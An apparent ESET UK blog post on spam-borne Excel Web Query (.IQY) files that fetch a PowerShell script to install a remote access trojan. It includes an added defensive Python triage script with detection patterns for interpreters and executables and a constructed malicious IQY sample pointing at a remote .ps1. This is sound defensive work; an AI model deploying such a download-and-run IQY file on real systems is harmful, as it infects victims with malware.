Baddies bypass AV with Excel files


Excel Web Query (.IQY) files are being used to bypass some antivirus software and infect victims with a remote access trojan (RAT) malware.

Cyber criminals are always on the hunt for simple but effective ways of evading antivirus software and infecting as many victims as possible.

The latest method to make the news involves using an IQY file, a file type designed to pull data from the internet directly into Excel, to launch a PowerShell script.

Mark James, ESET IT Security Specialist, explains why this method is so effective against certain types of antivirus software.

“Malware writers will look at lots of different techniques to deliver malware to the victim’s machine; some are successful, some are not.

“In this case the file is usually attached to spam messages trying to trick the user into opening the attached file.

“Usually something that will pull on the financial strings of the victim: an unpaid invoice or extremely large utility bill.

“The small file basically contains a URL that downloads a PowerShell script; this in turn, once run, will enable further downloading of malware onto your machine.

“The problem here is the means to do all this is also widely used on desktops and servers, making it harder to detect without causing false positives.

“The way around this is for your antivirus software to use multiple detection methods that may include but are not limited to memory scanners, behavioural detection and machine learning to detect and stop these threats. This just highlights the fact that not all antivirus software is equal.”
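Because an IQY file is plain text whose whole purpose is to make Excel fetch a URL, a mail gateway or triage script can inspect that URL before the attachment ever reaches a user. The following is an added example, not code from the article or from ESET; it assumes the standard IQY layout (first line `WEB`, second line a version `1`, third line the URL, optional `name=value` settings after that), and the allowlist of internal hosts and the two sample attachments are constructed for illustration.

```python
"""Triage Excel Web Query (.iqy) attachments before a user opens them.

Added defensive example (not the article's or ESET's code). Assumed IQY
layout: line 1 is the query type ("WEB"), line 2 a format version ("1"),
line 3 the URL Excel will fetch on open, later lines optional settings.
The URL is the only thing that matters for triage, so that is what we check.
"""
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlparse

# Constructed allowlist of hosts that legitimately feed spreadsheets; a real
# deployment would populate this from its own inventory of report servers.
ALLOWED_HOSTS = {"reports.internal.example", "bi.internal.example"}

# URL features that a "download data into Excel" query should never have.
SUSPICIOUS_PATH = re.compile(r"\.(ps1|bat|cmd|vbs|js|hta|exe|dll)(\?|$)", re.IGNORECASE)
SUSPICIOUS_TEXT = re.compile(r"powershell|cmd\.exe|wscript", re.IGNORECASE)
RAW_IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


@dataclass
class IqyVerdict:
    url: Optional[str]
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def parse_iqy(text: str) -> tuple:
    """Return (url, settings) from IQY content; url is None if malformed."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None, {}
    settings = {}
    for ln in lines[3:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            settings[key.strip()] = value.strip()
    return lines[2], settings


def triage_iqy(text: str) -> IqyVerdict:
    """Flag an IQY whose fetch URL does not look like a spreadsheet feed."""
    url, _settings = parse_iqy(text)
    verdict = IqyVerdict(url=url)
    if url is None:
        verdict.findings.append("not a well-formed WEB query")
        return verdict
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https"):
        verdict.findings.append(f"unexpected scheme {parsed.scheme!r}")
    if host not in ALLOWED_HOSTS:
        verdict.findings.append(f"host {host!r} not in allowlist")
    if RAW_IPV4.fullmatch(host):
        verdict.findings.append("raw IP address instead of a hostname")
    if SUSPICIOUS_PATH.search(parsed.path) or SUSPICIOUS_PATH.search(parsed.query):
        verdict.findings.append("URL points at a script or executable")
    if SUSPICIOUS_TEXT.search(url):
        verdict.findings.append("URL mentions a script interpreter")
    return verdict


# Constructed sample attachments (not real campaign artefacts).
BENIGN_IQY = "WEB\n1\nhttps://reports.internal.example/sales.csv\n\nSelection=EntirePage\n"
MALICIOUS_IQY = "WEB\n1\nhttp://198.51.100.23/unpaid-invoice.ps1\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_IQY), ("malicious", MALICIOUS_IQY)):
        verdict = triage_iqy(sample)
        print(name, verdict.url, "SUSPICIOUS" if verdict.suspicious else "ok", verdict.findings)
```

The allowlist is the check that does the real work: the file type itself is legitimate, so blocking on extension alone would break genuine reports, while a fetch URL outside the organisation's known data sources is the signal the quote above describes. The path and interpreter patterns are secondary and catch only the lazier cases.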

How do you spot emails with fake attachments? Let us know on Twitter @ESETUK.

ESET IT security software uses multiple forms of detection that are layered to ensure that virtually nothing, be it old malware or brand new, can slip through and make your life a misery. With ESET, you can leave the security to us, while you explore the internet in safety.